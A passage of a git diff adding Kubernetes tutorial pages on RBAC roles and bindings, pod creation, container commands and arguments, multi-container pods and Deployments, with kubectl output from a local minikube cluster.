processes running inside pods, which want to authenticate against the API. + + - Groups: This is used for referring to multiple accounts. There are some groups created by default such as cluster-admin (explained in later sections). + + - RoleBindings and ClusterRoleBindings: Just as the names imply, these bind subjects to roles (i.e. the operations a given user can perform). As for Roles and ClusterRoles, the difference lies in the scope: a RoleBinding will make the rules effective inside a namespace, whereas a ClusterRoleBinding will make the rules effective in all namespaces. + +#### kubectl explain rolebinding + + ``` + βœ— kubectl explain rolebindings +GROUP: rbac.authorization.k8s.io +KIND: RoleBinding +VERSION: v1 + +DESCRIPTION: + RoleBinding references a role, but does not contain it. It can reference a + Role in the same namespace or a ClusterRole in the global namespace. It adds + who information via Subjects and namespace information by which namespace it + exists in. RoleBindings in a given namespace only have effect in that + namespace. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + roleRef -required- + RoleRef can reference a Role in the current namespace or a ClusterRole in + the global namespace. If the RoleRef cannot be resolved, the Authorizer must + return an error. This field is immutable. + + subjects <[]Subject> + Subjects holds references to the objects the role applies to. 
+ +``` +#### kubectl explain clusterrolebindings + +``` +kubectl explain clusterrolebindings +GROUP: rbac.authorization.k8s.io +KIND: ClusterRoleBinding +VERSION: v1 + +DESCRIPTION: + ClusterRoleBinding references a ClusterRole, but not contain it. It can + reference a ClusterRole in the global namespace, and adds who information + via Subject. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + roleRef -required- + RoleRef can only reference a ClusterRole in the global namespace. If the + RoleRef cannot be resolved, the Authorizer must return an error. This field + is immutable. + + subjects <[]Subject> + Subjects holds references to the objects the role applies to. + +``` + +With Minikube, you can experiment with RBAC in a local Kubernetes setup. Minikube comes with RBAC enabled by default if you start it with a Kubernetes version that supports RBAC + +``` + βœ— minikube start +πŸ˜„ minikube v1.30.1 on Darwin 14.1.1 (arm64) +πŸŽ‰ minikube 1.32.0 is available! Download it: https://github.com/kubernetes/minikube/releases/tag/v1.32.0 +πŸ’‘ To disable this notice, run: 'minikube config set WantUpdateNotification false' + +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”— Configuring Flannel (Container Networking Interface) ... +🌟 Enabled addons: +πŸ”Ž Verifying Kubernetes components... +πŸ‘ Starting worker node minikube-m02 in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube-m02" ... +🌐 Found network options: + β–ͺ NO_PROXY=192.168.49.2 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... + β–ͺ env NO_PROXY=192.168.49.2 +πŸ”Ž Verifying Kubernetes components... +πŸ„ Done! 
kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` + +#### Create new namespace + +Execute the kubectl create command to create the namespace (as the admin user): + +``` +kubernetesdaily.github.io git:(main) βœ— kubectl create namespace kubedaily +namespace/kubedaily created +``` + +#### Create the user credentials + +genarete the user credentials using openssl command + +``` + openssl genrsa -out kubedaily.key 2048 +Generating RSA private key, 2048 bit long modulus +................................................................+++++ +.............................................................................+++++ +e is 65537 (0x10001) + +``` +Create a certificate sign request using openssl command + +``` + kubernetesdaily.github.io git:(main) βœ— openssl req -new -key kubedaily.key -out kubedaily.csr -subj "/CN=kubedaily/O=sangam" +``` + +``` +➜ .minikube ls +addons ca.pem certs key.pem machine_client.lock proxy-client-ca.crt +ca.crt cache config last_update_check machines proxy-client-ca.key +ca.key cert.pem files logs profiles tunnels.json +``` + +``` + kubernetesdaily.github.io git:(main) βœ— kubectl config set-credentials kubedaily --client-certificate=/.certs/kubedaily.crt --client-key=/.certs/kubedaily.key +User "kubedaily" set. +kubectl config set-context kubedaily-context --cluster=minikube --namespace=kubedaily --user=sangam +``` +Now you should get an access denied error when using the kubectl CLI with this configuration file. This is expected as we have not defined any permitted operations for this user. + +``` + kubectl --context=kubedaily-context get pods +``` + +#### Create the role for managing deployments + +``` +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + namespace: kubedaily + name: sangam +rules: +- apiGroups: ["", "extensions", "apps"] + resources: ["deployments", "replicasets", "pods"] + verbs: ["get", "list", "watch", "create", "update", "patch", "delete"] # You can also use ["*"] + +``` + +#### Create the role binding + +``` +kind: RoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: sangam-binding + namespace: kubedaily +subjects: +- kind: User + name: sangam + apiGroup: "" +roleRef: + kind: Role + name: sangam + apiGroup: "" + +``` + +``` +➜ kubernetesdaily.github.io git:(main) βœ— kubectl create -f rolebinding-deployment-manager.yaml +rolebinding.rbac.authorization.k8s.io/sangam-binding created +``` \ No newline at end of file diff --git a/content/en/k8s/c2.Basics-of-pods 2.md b/content/en/k8s/c2.Basics-of-pods 2.md new file mode 100644 index 0000000..e633b27 --- /dev/null +++ b/content/en/k8s/c2.Basics-of-pods 2.md @@ -0,0 +1,310 @@ +--- +title: " Basics of Pod " +description: " Kubectl explain pod " +slug: "Basics-of-Pod" +--- + + +#### 0. What is POD learn via Kubectl Explain + + +```sh +kubectl explain pod +KIND: Pod +VERSION: v1 + +DESCRIPTION: + Pod is a collection of containers that can run on a host. This resource is + created by clients and scheduled onto hosts. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. 
In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Specification of the desired behavior of the pod. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + status + Most recently observed status of the pod. This data may not be up to date. + Populated by the system. Read-only. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + +``` + + +#### 1. Create a Pod from Nginx Image + +```sh +➜ k8sworkshop git:(main) βœ— kubectl run nginx --image=nginx + +pod/nginx created + +➜ k8sworkshop git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +nginx 1/1 Running 0 25s + +``` +#### 2. Create a Pod and Expose a Port +```sh +➜ k8sworkshop git:(main) βœ— kubectl run nginx-port --image=nginx --port=80 +pod/nginx-port created +➜ k8sworkshop git:(main) βœ— kubectl describe pod nginx-port +Name: nginx-port +Namespace: default +Priority: 0 +Service Account: default +Node: minikube/192.168.49.2 +Start Time: Mon, 06 Mar 2023 01:44:56 +0530 +Labels: run=nginx-port +Annotations: +Status: Running +IP: 172.17.0.4 +IPs: + IP: 172.17.0.4 +Containers: + nginx-port: + Container ID: docker://8260b161cc305d1cf4060dff9edbd0b05e86d9c4fc441b5a0a51b9dbe35403d3 + Image: nginx + Image ID: docker-pullable://nginx@sha256:aa0afebbb3cfa473099a62c4b32e9b3fb73ed23f2a75a65ce1d4b4f55a5c2ef2 + Port: 80/TCP + Host Port: 0/TCP + State: Running + Started: Mon, 06 Mar 2023 01:44:59 +0530 + Ready: True + Restart Count: 0 + Environment: + Mounts: + /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-ffpjx (ro) +Conditions: + Type Status + Initialized True + Ready True + ContainersReady True + PodScheduled True +Volumes: + kube-api-access-ffpjx: + Type: Projected (a volume that contains injected data from multiple sources) + TokenExpirationSeconds: 3607 + ConfigMapName: kube-root-ca.crt + ConfigMapOptional: + DownwardAPI: true +QoS Class: BestEffort +Node-Selectors: +Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s + node.kubernetes.io/unreachable:NoExecute op=Exists for 300s +Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal Scheduled 20s default-scheduler Successfully assigned default/nginx-port to minikube + Normal Pulling 20s kubelet Pulling image "nginx" + Normal Pulled 18s kubelet Successfully pulled image "nginx" in 2.236192917s + Normal Created 18s kubelet Created container nginx-port + Normal Started 18s kubelet Started container nginx-port +➜ k8sworkshop git:(main) βœ— +``` + + +#### 3. 
Output the Manifest File + +```sh +kubectl run nginx --image=nginx --port=80 --dry-run=client -o yaml +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + run: nginx + name: nginx +spec: + containers: + - image: nginx + name: nginx + ports: + - containerPort: 80 + resources: {} + dnsPolicy: ClusterFirst + restartPolicy: Always +status: {} +``` +alternative + + +```sh + kubectl run nginx --image=nginx --port=80 --dry-run=client -o yaml > ngnix.yaml +➜ k8sworkshop git:(main) βœ— ls +LICENSE context data ngnix.yaml package.json styles +README.md course.json lessons node_modules pages workshop +components csv next.config.js package-lock.json public +➜ k8sworkshop git:(main) βœ— cat ngnix.yaml +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + run: nginx + name: nginx +spec: + containers: + - image: nginx + name: nginx + ports: + - containerPort: 80 + resources: {} + dnsPolicy: ClusterFirst + restartPolicy: Always +status: {} +➜ k8sworkshop git:(main) βœ— + +``` + +#### 4. Delete PODS +```sh + k8sworkshop git:(main) βœ— kubectl delete pod nginx +pod "nginx" deleted + +➜ k8sworkshop git:(main) βœ— kubectl delete pod --all +pod "nginx-port" deleted +``` + + +#### List the Worker Node +```sh +kubectl get nodes +``` +#### Create a new POD from Nginx Image +```sh +kubectl run mywebserver --image=nginx +``` +#### List the PODS that are currently running. +```sh +kubectl get pods +``` +#### Connect inside the POD +```sh +kubectl exec -it mywebserver -- bash +``` +You can come out of the POD with CTRL+D +```sh +kubectl exec -it mywebserver -- ls -l / +``` +#### Delete the POD +```sh +kubectl delete pod mywebserver +``` + +##### pod-expose-port.yaml + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: nginx-pod +spec: + containers: + - image: nginx + name: democontainer + ports: + - containerPort: 8080 +``` +```sh +kubectl apply -f pod-expose-port.yaml +``` +```sh +kubectl get pods + +kubectl describe pod nginx-pod + +➜ k8sworkshop git:(main) βœ— kubectl explain pod.spec.containers.ports +KIND: Pod +VERSION: v1 + +RESOURCE: ports <[]Object> + +DESCRIPTION: + List of ports to expose from the container. Not specifying a port here DOES + NOT prevent that port from being exposed. Any port which is listening on + the default "0.0.0.0" address inside a container will be accessible from + the network. Modifying this array with strategic merge patch may corrupt + the data. For more information See + https://github.com/kubernetes/kubernetes/issues/108255. Cannot be updated. + + ContainerPort represents a network port in a single container. + +FIELDS: + containerPort -required- + Number of port to expose on the pod's IP address. This must be a valid port + number, 0 < x < 65536. + + hostIP + What host IP to bind the external port to. + + hostPort + Number of port to expose on the host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork is specified, this must match + ContainerPort. Most containers do not need this. + + name + If specified, this must be an IANA_SVC_NAME and unique within the pod. Each + named port in a pod must have a unique name. Name for the port that can be + referred to by services. + + protocol + Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". + Possible enum values: + - `"SCTP"` is the SCTP protocol. + - `"TCP"` is the TCP protocol. + - `"UDP"` is the UDP protocol. 
+ +➜ k8sworkshop git:(main) βœ— +``` + + +### Finding a Pod’s Cluster IP + +```sh +k8s101 git:(main) βœ— kubectl get pod -o wide +NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES +nginx-pod 1/1 Running 0 95s 172.17.0.7 minikube +nginx-port 1/1 Running 0 108m 172.17.0.3 minikube + +``` + +### Finding a Service’s IP + +We can find a Service IP using kubectl as well. In this case we will list all services in all namespaces: + +```sh +➜ k8s101 git:(main) βœ— kubectl get service --all-namespaces + +NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +default kubernetes ClusterIP 10.96.0.1 443/TCP 114d +kube-system kube-dns ClusterIP 10.96.0.10 53/UDP,53/TCP,9153/TCP 114d +kube-system metrics-server ClusterIP 10.106.73.183 443/TCP 36m +kubernetes-dashboard dashboard-metrics-scraper ClusterIP 10.109.38.100 8000/TCP 110m +kubernetes-dashboard kubernetes-dashboard ClusterIP 10.108.78.110 80/TCP 110m +➜ k8s101 git:(main) βœ— + +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl get pod nginx-pod --template='{{(index (index .spec.containers 0).ports 0).containerPort}}{{"\n"}}' +8080 + +``` + diff --git a/content/en/k8s/c3.pod-command-args 2.md b/content/en/k8s/c3.pod-command-args 2.md new file mode 100644 index 0000000..24eae37 --- /dev/null +++ b/content/en/k8s/c3.pod-command-args 2.md @@ -0,0 +1,141 @@ +--- +title: "Create POD with Command and Arguments " +description: " Kubectl explain pod " +slug: "Create-POD-with-Command-and-Arguments" +--- + +#### kubectl explain pods.spec.containers.command + +```sh +k8s101 git:(main) βœ— kubectl explain pods.spec.containers.command +KIND: Pod +VERSION: v1 + +FIELD: command <[]string> + +DESCRIPTION: + Entrypoint array. Not executed within a shell. The container image's + ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) + are expanded using the container's environment. If a variable cannot be + resolved, the reference in the input string will be unchanged. Double $$ + are reduced to a single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless of whether the + variable exists or not. Cannot be updated. More info: + https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell +➜ k8s101 git:(main) βœ— +``` + +#### Create POD without any commands or arguments. +args in Kubernetes overrides CMD in the original docker image. +command in Kubernetes overrides ENTRYPOINT in the original docker image. + +##### commands.yaml + +```yml +apiVersion: v1 +kind: Pod +metadata: + name: command +spec: + containers: + - image: busybox + name: count +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +pod/command created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +command 0/1 CrashLoopBackOff 1 (5s ago) 15s +nginx-pod 1/1 Running 0 50m +nginx-port 1/1 Running 0 156m +webserver 1/1 Running 0 34m +➜ k8s101 git:(main) βœ— kubectl exec -it command -- bash + +``` + +#### Create POD with Command + +Modify the POD contents to the following one. 
+ +```sh +apiVersion: v1 +kind: Pod +metadata: + name: command2 +spec: + containers: + - image: busybox + name: count + command: ["sleep","3600"] +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +pod/command2 created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +command 1/1 Running 0 67s +➜ k8s101 git:(main) βœ— kubectl exec -it command2 -- sh +/ # ls +bin dev etc home lib lib64 proc root sys tmp usr var +/ # +``` + +#### Create POD with Command and Arguments + +Modify the YAML file contents to the following one. + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: command3 +spec: + containers: + - image: busybox + name: count + command: ["sleep"] + args: ["3600"] +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +pod/command3 created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +command 1/1 Running 0 3m18s +command2 1/1 Running 0 2m34s +command3 1/1 Running 0 14s +``` + +#### Create POD with Arguments + +Modify the YAML file contents to the following one. + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: command3 +spec: + containers: + - name: command3 + image: debian + command: ["printenv"] + args: ["HOSTNAME", "KUBERNETES_PORT"] +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +➜ k8s101 git:(main) βœ— kubectl logs command3 +command3 +tcp://10.96.0.1:443 +``` diff --git a/content/en/k8s/c4.multipod-container 2.md b/content/en/k8s/c4.multipod-container 2.md new file mode 100644 index 0000000..7dacfb8 --- /dev/null +++ b/content/en/k8s/c4.multipod-container 2.md @@ -0,0 +1,217 @@ +--- +title: "Multi-Container Pods" +description: " Use Cases for Multi-Container Pods " +slug: "Multi-Container-Pods" +--- + + +##### Why does Kubernetes allow more than one container in a Pod +- Containers in a Pod runs on a "logical host": they use the same network namespace (same IP address and port space), they can use shared volumes +- using several containers for an application is simpler to use, more transparent, and allows decoupling software dependencies + +##### Use Cases for Multi-Container Pods + +The primary purpose of a multi-container Pod is to support co-located, co-managed helper processes for a main program + +Sidecar containers: +"help" the main container. For example, log or data change watchers, monitoring adapters, and so on. +A log watcher, for example, can be built once by a different team and reused across different applications +Another example of a sidecar container is a file or data loader that generates data for the main container. + +#### Communication Between Containers in a Pod + +Shared volumes: +you can use a shared Kubernetes Volume as a simple and efficient way to share data between containers in a Pod. +Volumes enables data to survive container restarts. It has the same lifetime as a Pod. +it is sufficient to use a directory on the host that is shared with all containers within a Pod + +- A standard use case for a multi-container Pod with shared Volume is when one container writes to the shared directory (logs or other files), and the other container reads from the shared directory +- The second container uses Debian image and has the shared volume mounted to the directory /html. The second container every second adds current date and time and into index.html that is located in the shared volume. 
+- Nginx servers reads this file and transfers it to the user for each HTTP request to the web server. + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: mc1 +spec: + volumes: + - name: html + emptyDir: {} + containers: + - name: 1st + image: nginx + volumeMounts: + - name: html + mountPath: /usr/share/nginx/html + - name: 2nd + image: debian + volumeMounts: + - name: html + mountPath: /html + command: ["/bin/sh", "-c"] + args: + - while true; do + date >> /html/index.html; + sleep 1; + done + +``` +#### kubectl apply + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f mc1.yaml +pod/mc1 created + +``` + +#### exec into mc1 pod 1st container + +```sh +➜ k8s101 git:(main) βœ— kubectl exec mc1 -c 1st -- /bin/cat /usr/share/nginx/html/index.html +Mon Mar 6 18:30:15 UTC 2023 +Mon Mar 6 18:30:16 UTC 2023 +Mon Mar 6 18:30:17 UTC 2023 +Mon Mar 6 18:30:18 UTC 2023 +Mon Mar 6 18:30:20 UTC 2023 +Mon Mar 6 18:30:21 UTC 2023 +Mon Mar 6 18:30:22 UTC 2023 +Mon Mar 6 18:30:23 UTC 2023 +Mon Mar 6 18:30:24 UTC 2023 +Mon Mar 6 18:30:25 UTC 2023 +Mon Mar 6 18:30:26 UTC 2023 +Mon Mar 6 18:30:27 UTC 2023 +Mon Mar 6 18:30:28 UTC 2023 +Mon Mar 6 18:30:29 UTC 2023 +Mon Mar 6 18:30:30 UTC 2023 +Mon Mar 6 18:30:31 UTC 2023 +Mon Mar 6 18:30:32 UTC 2023 +Mon Mar 6 18:30:33 UTC 2023 +Mon Mar 6 18:30:34 UTC 2023 +Mon Mar 6 18:30:35 UTC 2023 +Mon Mar 6 18:30:36 UTC 2023 +Mon Mar 6 18:30:37 UTC 2023 +Mon Mar 6 18:30:38 UTC 2023 +Mon Mar 6 18:30:39 UTC 2023 +Mon Mar 6 18:30:40 UTC 2023 +Mon Mar 6 18:30:41 UTC 2023 +Mon Mar 6 18:30:42 UTC 2023 +Mon Mar 6 18:30:43 UTC 2023 +Mon Mar 6 18:30:44 UTC 2023 +Mon Mar 6 18:30:45 UTC 2023 +Mon Mar 6 18:30:46 UTC 2023 +Mon Mar 6 18:30:47 UTC 2023 +Mon Mar 6 18:30:48 UTC 2023 +Mon Mar 6 18:30:49 UTC 2023 +Mon Mar 6 18:30:50 UTC 2023 +Mon Mar 6 18:30:51 UTC 2023 +Mon Mar 6 18:30:52 UTC 2023 +Mon Mar 6 18:30:53 UTC 2023 +Mon Mar 6 18:30:54 UTC 2023 +Mon Mar 6 18:30:55 UTC 2023 +Mon Mar 6 18:30:56 UTC 2023 +Mon Mar 6 18:30:57 UTC 2023 +Mon Mar 6 18:30:58 UTC 2023 +Mon Mar 6 18:30:59 UTC 2023 +Mon Mar 6 18:31:00 UTC 2023 +Mon Mar 6 18:31:01 UTC 2023 +Mon Mar 6 18:31:02 UTC 2023 +Mon Mar 6 18:31:03 UTC 2023 +Mon Mar 6 18:31:04 UTC 2023 +Mon Mar 6 18:31:05 UTC 2023 +Mon Mar 6 18:31:06 UTC 2023 +Mon Mar 6 18:31:07 UTC 2023 +Mon Mar 6 18:31:08 UTC 2023 +Mon Mar 6 18:31:09 UTC 2023 +Mon Mar 6 18:31:10 UTC 2023 +Mon Mar 6 18:31:11 UTC 2023 +Mon Mar 6 18:31:12 UTC 2023 +Mon Mar 6 18:31:13 UTC 2023 +Mon Mar 6 18:31:14 UTC 2023 +Mon Mar 6 18:31:15 UTC 2023 +Mon Mar 6 18:31:16 UTC 2023 +Mon Mar 6 18:31:17 UTC 2023 +Mon Mar 6 18:31:18 UTC 2023 +Mon Mar 6 18:31:19 UTC 2023 +Mon Mar 6 18:31:20 UTC 2023 +Mon Mar 6 18:31:21 UTC 2023 +Mon Mar 6 18:31:22 UTC 2023 +Mon Mar 6 18:31:23 UTC 2023 +Mon Mar 6 18:31:24 UTC 2023 +Mon Mar 6 18:31:25 UTC 2023 +Mon Mar 6 18:31:26 UTC 2023 +Mon Mar 6 18:31:27 UTC 2023 +Mon Mar 6 18:31:28 UTC 2023 +Mon Mar 6 18:31:29 UTC 2023 +Mon Mar 6 18:31:30 UTC 2023 +Mon Mar 6 18:31:31 UTC 2023 +Mon Mar 6 18:31:32 UTC 2023 +Mon Mar 6 18:31:33 UTC 2023 +Mon Mar 6 18:31:34 UTC 2023 +Mon Mar 6 18:31:35 UTC 2023 +Mon Mar 6 18:31:36 UTC 2023 +Mon Mar 6 18:31:37 UTC 2023 +Mon Mar 6 18:31:38 UTC 2023 +Mon Mar 6 18:31:39 UTC 2023 +Mon Mar 6 18:31:40 UTC 2023 +Mon Mar 6 18:31:41 UTC 2023 +Mon Mar 6 18:31:42 UTC 2023 +Mon Mar 6 18:31:43 UTC 2023 +Mon Mar 6 18:31:44 UTC 2023 +Mon Mar 6 18:31:45 UTC 2023 +``` + +#### exec into mc1 pod 3nd container + +```sh + k8s101 git:(main) βœ— kubectl exec mc1 -c 2nd -i -t -- bash -il +root@mc1:/# ls +bin boot dev etc home html lib media mnt opt proc 
root run sbin srv sys tmp usr var +root@mc1:/# cd html +root@mc1:/html# ls +index.html +root@mc1:/html# +``` + + +#### Kubernetes has three Object Types you should know about: + +- Pods - runs one or more closely related containers + +- Services - sets up networking in a Kubernetes cluster + +- Deployment - Maintains a set of identical pods, ensuring that they have the correct config and that the right number of them exist. + +Pods: + +- Runs a single set of containers +- Good for one-off dev purposes +- Rarely used directly in production + +Deployment: + +- Runs a set of identical pods +- Monitors the state of each pod, updating as necessary +- Good for dev +- Good for production + + +Pod templates : + +Controllers for workload resources create Pods from a pod template and manage those Pods on your behalf. + +-PodTemplates are specifications for creating Pods, and are included in workload resources such as Deployments, Jobs, and DaemonSets. + +``` +k8sworkshop git:(main) βœ— kubectl get all +NAME READY STATUS RESTARTS AGE +pod/command3 0/1 CrashLoopBackOff 65 (4m59s ago) 20h +pod/mc1 2/2 Running 0 77m + +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +service/kubernetes ClusterIP 10.96.0.1 443/TCP 115d + +``` + + + diff --git a/content/en/k8s/c5.Deployment-Replicaset 2.md b/content/en/k8s/c5.Deployment-Replicaset 2.md new file mode 100644 index 0000000..0e77361 --- /dev/null +++ b/content/en/k8s/c5.Deployment-Replicaset 2.md @@ -0,0 +1,416 @@ +--- +title: "Deployments and replication" +description: " Use Cases for Multi-Container Pods " +slug: "Deployments-and-replication" +--- + + +#### Kubectl explain Deployment + +```sh +k8sworkshop git:(main) βœ— kubectl explain deployments +KIND: Deployment +VERSION: apps/v1 + +DESCRIPTION: + Deployment enables declarative updates for Pods and ReplicaSets. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Specification of the desired behavior of the Deployment. + + status + Most recently observed status of the Deployment. + +➜ k8sworkshop git:(main) βœ— + +``` + + + +#### Kubectl explain Replicaset + +```sh +➜ k8sworkshop git:(main) βœ— kubectl explain rs +KIND: ReplicaSet +VERSION: apps/v1 + +DESCRIPTION: + ReplicaSet ensures that a specified number of pod replicas are running at + any given time. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. 
More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + If the Labels of a ReplicaSet are empty, they are defaulted to be the same + as the Pod(s) that the ReplicaSet manages. Standard object's metadata. More + info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Spec defines the specification of the desired behavior of the ReplicaSet. + More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + status + Status is the most recently observed status of the ReplicaSet. This data + may be out of date by some window of time. Populated by the system. + Read-only. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + +➜ k8sworkshop git:(main) βœ— +``` + +#### Overview on Kubernetes Deployment + +Kubernetes also provides Deployment resource that sits on top of ReplicaSets and enables declarative application updates. + +- When running Pods in datacenter, additional features may be needed such as scalability, updates and rollback etc which are offered by Deployments
+ +- A Deployment is a higher-level resource meant for deploying applications and updating them declaratively, instead of doing it through a +ReplicationController or a ReplicaSet, which are both considered lower-level concepts. +
+- When you create a Deployment, a ReplicaSet resource is created underneath. ReplicaSets replicate and manage pods as well.
+
+- When using a Deployment, the actual pods are created and managed by the Deployment’s ReplicaSets, not by the Deployment directly.
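+You can verify this ownership chain on a running cluster (a sketch; `<pod-name>` and `<replicaset-name>` are placeholders for names reported by `kubectl get`):
+
+```sh
+# the Deployment, the ReplicaSet it created, and the Pods the ReplicaSet manages
+kubectl get deployments,rs,pods
+
+# "Controlled By" shows the owner of each object:
+# a Pod is controlled by a ReplicaSet, and that ReplicaSet by the Deployment
+kubectl describe pod <pod-name> | grep "Controlled By"
+kubectl describe rs <replicaset-name> | grep "Controlled By"
+```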
+
+##### Create Kubernetes Deployment resource
+
+In the Deployment spec, the following properties are managed (see the manifest sketch after this list):
+
+- `replicas`: specifies how many copies of each Pod should be running
+- `strategy`: specifies how Pods are replaced when the Deployment is updated
+- `selector`: uses `matchLabels` to identify, by label, which Pods the Deployment manages
+- `template`: contains the Pod specification the Deployment uses to create Pods
+
+Common imperative operations on a Deployment:
+
+- scale: `kubectl scale deployment nginx-deployment --replicas 10`
+- set image: `kubectl set image deployment nginx-deployment nginx=nginx:1.91 --record`
+- rollout undo: `kubectl rollout undo deployment nginx-deployment`
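+Putting the spec fields together, a minimal Deployment manifest might look like this (a sketch; the name, labels, and image are only illustrative):
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: nginx-deployment        # illustrative name
+spec:
+  replicas: 3                   # how many Pod copies to keep running
+  strategy:
+    type: RollingUpdate         # how Pods are replaced during updates
+  selector:
+    matchLabels:
+      app: nginx                # must match the labels in the template below
+  template:
+    metadata:
+      labels:
+        app: nginx
+    spec:
+      containers:
+      - name: nginx
+        image: nginx
+```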
+ +we will create a new deployment using kubectl using --dry-run so that actually a deployment is not created but just verified + +```sh +➜ k8sworkshop git:(main) βœ— kubectl create deployment nginx-deploy --image=nginx --dry-run=client -o yaml > nginx-deploy.yml + +-- Basic Template to cleanup + +[root@controller ~]# cat nginx-deploy.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + creationTimestamp: null + labels: + app: nginx-deploy + name: nginx-deploy +spec: + replicas: 1 + selector: + matchLabels: + app: nginx-deploy + strategy: {} + template: + metadata: + creationTimestamp: null + labels: + app: nginx-deploy + spec: + containers: + - image: nginx + name: nginx + resources: {} + +--- #Modify the contents of the deployment template +# cat nginx-deploy.yml +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + type: dev + name: nginx-deploy +spec: + replicas: 2 + selector: + matchLabels: + type: dev + template: + metadata: + labels: + type: dev + spec: + containers: + - image: nginx + name: nginx +``` + +```sh +➜ k8sworkshop git:(main) βœ— kubectl create -f nginx-deploy.yml +deployment.apps/nginx-deploy created + +``` +```sh +➜ k8sworkshop git:(main) βœ— kubectl rollout status deployment nginx-deploy +deployment "nginx-deploy" successfully rolled out +``` + +```sh +➜ k8sworkshop git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +nginx-deploy-66dc98fc6f-6ws8k 1/1 Running 0 37s +nginx-deploy-66dc98fc6f-btk6j 1/1 Running 0 37s +``` +```sh +kubectl describe 